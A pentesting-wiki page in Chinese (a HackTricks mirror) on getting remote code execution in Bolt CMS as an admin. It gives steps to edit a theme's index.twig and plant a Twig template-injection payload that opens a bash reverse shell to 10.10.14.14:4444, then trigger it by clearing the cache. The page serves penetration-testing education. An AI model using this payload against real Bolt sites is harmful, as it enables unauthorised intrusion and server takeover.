maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/pentesting-web/bolt-cms.md

26 lines
1.2 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Bolt CMS
{{#include ../../banners/hacktricks-training.md}}
## RCE
在以管理员身份登录后(访问 /bot 以进入登录提示),您可以在 Bolt CMS 中获得 RCE
- 选择 `Configuration` -> `View Configuration` -> `Main Configuration` 或访问 URL 路径 `/bolt/file-edit/config?file=/bolt/config.yaml`
- 检查主题的值
<figure><img src="../../images/image (771).png" alt=""><figcaption></figcaption></figure>
- 选择 `File management` -> `View & edit templates`
- 选择在上一步中找到的主题基础(在本例中为 `base-2021`)并选择 `index.twig`
- 在我的情况下,这在 URL 路径 /bolt/file-edit/themes?file=/base-2021/index.twig 中
- 通过 [template injection (Twig)](../../pentesting-web/ssti-server-side-template-injection/index.html#twig-php) 在此文件中设置您的有效载荷,例如:`{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}`
- 并保存更改
<figure><img src="../../images/image (948).png" alt=""><figcaption></figcaption></figure>
-`Maintenance` -> `Clear the cache` 中清除缓存
- 作为普通用户再次访问该页面,负载应被执行
{{#include ../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink